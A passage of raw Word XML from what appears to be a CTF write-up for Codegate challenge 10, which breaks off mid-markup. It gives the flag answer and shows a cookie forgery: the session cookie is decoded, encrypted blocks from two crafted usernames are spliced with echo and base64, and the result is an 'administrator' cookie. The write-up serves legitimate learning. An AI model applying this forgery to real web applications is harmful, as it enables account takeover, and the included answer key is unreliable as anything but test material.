    <w:p w:rsidR="009934CF" w:rsidRPr="009934CF" w:rsidRDefault="009934CF" w:rsidP="009934CF">
      <w:pPr>
        <w:pStyle w:val="Img"/>
        <w:spacing w:after="280" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1082" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762DA2" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc257340760"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge10</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:300   </w:t>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:t>Cleared</w:t>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Answer:O</w:t>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:t>ne if by land; two if by sea!!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762DA2" w:rsidRDefault="00762DA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00762DA2" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2079" type="#_x0000_t202" style="width:437.4pt;height:38.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2079" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="004C534A" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:r w:rsidRPr="004C534A">
                    <w:t>credentials: http://ctf1.codegate.org/3ea2d867e871fdab011d066758489953/web3.php</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762DA2" w:rsidRDefault="00762DA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC1B76" w:rsidRDefault="00CC1E2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>login attemt "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1E2C">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>username=a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> " , set cookie is below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1B76" w:rsidRPr="009B3B94" w:rsidRDefault="00CC1B76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC1B76" w:rsidRDefault="00AA5FD6" w:rsidP="009B3B94">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2078" type="#_x0000_t202" style="width:402.2pt;height:17.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2078" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="009B3B94">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>web3_auth=wOnkpA358DsPGNv%2BKnSIpA%3D%3D%7C3449629152</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1B76" w:rsidRDefault="00CC1B76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC1E2C" w:rsidRPr="00CC1E2C" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r w:rsidR="00CC1E2C">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">data decoded. </w:t>
      </w:r>
      <w:r w:rsidR="00CC1E2C">
        <w:t>first half</w:t>
      </w:r>
      <w:r w:rsidR="00CC1E2C">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> is username base64 data, </w:t>
      </w:r>
      <w:r w:rsidR="00CC1E2C">
        <w:t>second half</w:t>
      </w:r>
      <w:r w:rsidR="00CC1E2C">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00CC1E2C" w:rsidRPr="00CC1E2C">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>unsigned int</w:t>
      </w:r>
      <w:r w:rsidR="00CC1E2C">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3B94" w:rsidRDefault="00AA5FD6" w:rsidP="00CC1E2C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2077" type="#_x0000_t202" style="width:402.2pt;height:17.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2077" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1E2C">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>wOnkpA358DsPGNv+KnSIpA==|3449629152</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1E2C" w:rsidRDefault="00CC1E2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC1E2C" w:rsidRDefault="00CC1E2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>we write program "prob10.rb"(attached this paper's end)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1E2C" w:rsidRPr="00CC1E2C" w:rsidRDefault="00CC1E2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC1E2C" w:rsidRDefault="00AA5FD6" w:rsidP="00B77BE6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2076" type="#_x0000_t202" style="width:399.85pt;height:52.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2076" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1E2C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Usage</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1E2C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  $ ./prob10.rb </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>username</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1E2C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>d0=</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>first half decoded cookie</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1E2C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>d1=</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>second half decoded cookie</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1E2C" w:rsidRDefault="00CC1E2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC1E2C" w:rsidRDefault="006A2FB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>second half is first half data's CRC-32 data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1B76" w:rsidRDefault="00CC1B76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC1B76" w:rsidRDefault="00AA5FD6" w:rsidP="009B3B94">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2075" type="#_x0000_t202" style="width:402.2pt;height:261.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2075" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>$ ruby prob10.rb adminis</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>==== POST username =====</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>d0=\x78\x40\x5c\x5a\xfd\xe5\x5c\x15\x7f\x0d\x91\xeb\xba\x44\x42\x6e (size:16)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>d1=3930958581 (hex:ea4daaf5) (size:10)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>"Hello, adminis!"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>$ ruby prob10.rb 1234567trator</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>==== POST username =====</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>d0=\x93\xee\x25\x03\xee\x08\x19\xa9\x81\x1b\x3f\xf1\xbc\xad\x79\x34\x64\x22\xd2\x2d\x36\x66\x7d\x68\x70\x3c\x12\x2d\x08\x79\x7d\x54 (size:32)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>d1=2433189419 (hex:9107862b) (size:10)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve">"Hello, 1234567trator!" </w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>$echo -e -n "\x78\x40\x5c\x5a\xfd\xe5\x5c\x15\x7f\x0d\x91\xeb\xba\x44\x42\x6e\x64\x22\xd2\x2d\x36\x66\x7d\x68\x70\x3c\x12\x2d\x08\x79\x7d\x54"|base64</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>eEBcWv3lXBV/DZHrukRCbmQi0i02Zn1ocDwSLQh5fVQ=</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
